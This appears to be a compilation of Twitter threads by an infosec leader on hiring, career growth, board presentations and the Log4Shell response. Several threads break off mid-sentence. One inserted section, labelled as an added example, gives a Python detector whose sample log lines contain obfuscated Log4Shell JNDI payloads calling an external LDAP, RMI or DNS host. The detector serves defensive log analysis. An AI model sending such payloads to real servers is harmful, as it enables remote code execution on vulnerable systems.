No joke I still remember the exact details. That was the day I started my first salaried job as a programmer. I had no degree (I was enrolled in a Computer Science program at Marquette University), no real documented dev experience.
/1
All of what I knew of programming was self-taught and a little theory from my course work that I had only just begun that semester. BASIC, Visual C++, and a little bit of VB.
I got hired to write code for a home banking and billpay application. It was the dot com era.
/2
Programmers were in high demand. The company that hired me provided banking software as a service (we called it a service bureau back then) to banks across the country. Consumers nationwide relied on the systems I maintained to manage their accounts and to pay their bills.
/3
We processed billions of dollars in payments each year. System failures could result in massive financial chaos.
I was never asked to complete a practical programming exercise to get hired. No certifications were demanded of me. As an entry level programmer, I wasn't
/4
expected to have detailed understanding of SDLCs, organizational politics, etc. No, instead they saw I had some knowledge, a desire to learn and grow, and they had the confidence in their own ability to develop my skills for both the org's benefit and my own.
/5
We sit right now, in the #cybersecurity industry, in the same position we were back then with developers. A seemingly insurmountable need for skilled humans, implications that range from localized to highly critical. But look how few orgs are willing to take the same hiring
/6
approach. We say we want candidates with passion, yet it's only a cursory consideration in our hiring decisions. We force arbitrary requirements for certs, degrees, etc. Entry level positions are few and far between and those touted as entry level often have requirements that
/7
are anything but entry level. We aren't willing to grow grassroots talent and instead insist that cyber security is so critical that everyone we hire must be highly experienced. Ignoring the fact that without incubating talent, this is unsustainable.
/8
And we pay people horribly. Seeing "entry level" security analyst roles offering only $5-15K more than I got in my first programming role 25 years ago!!
This is why we have a talent disconnect. There's no shortage, it's a cavernous divide. And as much as we bemoan
/9
and blame recruiters/HR, we as hiring managers are EVERY BIT as culpable. We don't train in how to effectively recruit and hire. We ignore the fact that interviewing is a skill in and of itself and assume our job knowledge qualifies us as expert interviewers.
/10
It's time for all of us in #infosec, to stop blaming and take responsibility. To look at hiring differently. To take risks on people. To focus on growing grassroots talent. And ultimately to #DoBetterBeBetter.
I am so thankful every day for all the leaders in my past
/11
who took a chance on me and put me in the position I am today. I'm dedicating my book to one of them.
Be the kind of leader that someone remembers for life. Rob G., Tim P., Donna B., Aaron S., and Patrick F. I'll never forget them and what they've done for me.
/FIN
I don't come from money. Growing up, we weren't poor, but near the bottom of the 80's middle class. I always dreamed of being in a better financial position than my parents, but swore I wouldn't forget where I came from.
1/
My first child (of 3) came when I was 17. Married at 21, I lived through nearly two decades of overdrawn bank accounts, maxed out credit cards, collection calls and threats of lawsuits.
Ultimately, we were fortunate. Never had a night where I couldn't scrounge
2/
something together for dinner. I have my family to thank for much of that.
So why am I giving you this walk through Alyssa's past? Well because now in my 40's I'm in a position that I dreamed of as a child. Financially, while not rich by today's standards, I am in
3/
Christmas more than NYE for me is the time I look back.
I remember so clearly the day I took the red pill. While I knew it'd change my life, many of the changes came in ways I'd have never imagined. So many good things happened this year for me as a result of that day.
1/
I have learned to be authentic in ways I never was before.
That authenticity has allowed me to connect with people in ways I never did before.
Those connections have enabled me to climb mountains in my career and personal life faster than ever before.
2/
Summiting those mountains has given me confidence like never before.
Each climb has brought new amazing people into my life who I love and rely on for support in ways I never could before.
Sure, lots of crappy things have happened to me since taking the red pill too.
3/
I certainly believe while we have moved past the tip of the iceberg, we're nowhere near done with #log4j and its issues. EVERYONE is now looking at this package and finding new variants and even new vulns. Don't expect to sleep anytime soon my dear #infosec fam.
1/
That said, remember there are likely malicious actors out there looking for the next thing already. With log4j burnt and orgs rapidly applying mitigations and fixes, what next? Where do we find the next widely used package with significant vulnerabilities like this?
2/
With that in mind, please drop the adversarial bullshit. I've seen devs abdicating all responsibility for the maintainers. I've seen security folks hating on devs. The mistakes made that led to this vuln. are laughably easy (to us as #infosec professionals).
3/
Hey #infosec peeps, many of us are tired, frustrated, and exasperated by #Log4Shell.
That said, how about we not blast developers en-masse or even within OSS or even within the Log4j project. Let's remember we have culpability here as well.
1/
We did nothing with a warning that was given to us in 2016 at BlackHat. Not one detection rule or scanner policy was created.
Despite extensive OSS security research done by orgs and academia, we failed to find this vuln in probably the single most popular Java package.
2/
How many of us are scrambling now because basic security controls (WAFs, outbound connectivity lockdowns, etc.) that could have limited/prevented exploitation of this vulnerability don't exist in our environments?
3/
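The thread above points at two gaps: no detection rule was written after the 2016 warning, and no egress lockdown was in place to stop the callback. As an added example (not part of Alyssa's thread or any project's code), here is a small Python detector for the JNDI lookup strings used in Log4Shell exploitation attempts, run over constructed combined-format access-log lines. The IPs and hosts are made up; the log format is an assumption. It collapses the common lookup-based obfuscations (nested `${lower:}`/`${upper:}` and `${x:-y}` default-value lookups) before matching, so a naive grep for `${jndi:` is not trivially bypassed, and it pulls out the callback host, which is what you would feed an egress block list or a SIEM alert.

```python
"""Detect Log4Shell-style JNDI lookup strings in web access logs.

Added example, not from the original thread. Assumes Apache/nginx
combined log format with the source IP as the first field.
"""
import re

# Constructed sample log lines; IPs and hosts are documentation ranges, not real.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:01:04 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://203.0.113.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/c}"',
    '10.0.0.3 - - [10/Dec/2021:12:01:06 +0000] "GET /docs/jndi-guide HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

# ${lower:X} / ${upper:X} wrappers around single characters or fragments.
_LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-X} default-value lookups, including the bare ${::-X} form.
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The de-obfuscated lookup: ${jndi:<scheme>://<host>...
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)", re.IGNORECASE)
_SRC_IP = re.compile(r"^(\S+)")


def normalise(text: str) -> str:
    """Collapse lookup-based obfuscation until the string stops changing.

    Each substitution strictly shortens the string, so the loop terminates.
    """
    prev = None
    while prev != text:
        prev = text
        text = _LOWER_UPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text


def detect(lines):
    """Return one hit per line carrying a JNDI lookup: source IP, scheme, callback host."""
    hits = []
    for line in lines:
        match = _JNDI.search(normalise(line))
        if match:
            src = _SRC_IP.match(line).group(1)
            hits.append({
                "src_ip": src,
                "scheme": match.group(1).lower(),
                "host": match.group(2),
            })
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOGS):
        print(f"JNDI lookup from {hit['src_ip']} -> {hit['scheme']}://{hit['host']}")
```

The line mentioning `/docs/jndi-guide` is deliberately included as a benign path containing the substring `jndi`; only the `${jndi:` lookup form is flagged. The extracted hosts are the addresses that an egress allow-list on the application tier would have refused to connect to, which is the second control the tweet calls out.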
Thursday morning, back home after a few days of board meetings and I have some thoughts to share on being effective in board presentations. Tech and security leaders still seem to struggle in these settings so here goes:
As always, it's a 🧵
1/
1. Research your board members. Find out in advance who you'll be presenting to and look up their background. Talk to your peers who've chatted with the board before, see what intel you can get from them on the dynamics of those discussions. Prep accordingly.
2/
2. Read the room. Important with any presentation but particularly so in the board room. If they're looking at their phones, you lost them. It may be that you got too technical. Change things up, change your tone, elevate the message and grab their attention again.
3/
The number of potentially qualified people that I see self-eliminating from open #infosecjobs saddens me. The thing is when you're looking at job descriptions, there are two ways you can look at them.
In typical Alyssa fashion, a 🧵 follows:
1/
Some people will read through the requirements from an implicit mindset of identifying the reasons not to apply. They look for any requirements that suggest they're not qualified and when they find too many of them (for some that means even one), they choose not to apply.
2/
The other method, and the mindset I wish more job seekers would take, is to look at a job description with the focus of finding the reasons to apply. What requirements are things you're good at or could be good at? What responsibilities are areas of interest for you?
3/